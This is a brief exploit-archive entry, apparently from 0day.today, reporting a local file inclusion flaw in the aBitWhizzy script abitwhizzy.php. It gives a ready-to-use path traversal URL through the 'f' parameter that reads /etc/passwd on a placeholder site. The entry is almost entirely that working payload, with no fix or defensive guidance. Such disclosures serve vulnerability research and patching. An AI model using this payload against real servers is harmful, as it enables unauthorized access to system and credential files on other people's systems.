id: 1189
date: 11/21/2006
title: aBitWhizzy (abitwhizzy.php) Information Disclosure Vulnerability
author: Security Access Point
cves: 

================================================================
aBitWhizzy (abitwhizzy.php) Information Disclosure Vulnerability
================================================================



aBitWhizzy [local file include]
vendor site: http://www.unverse.net/abitwhizzy/
product : aBitWhizzy 
bug:local file include
global risk : high


http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd



#  0day.today [2023-03-24]  #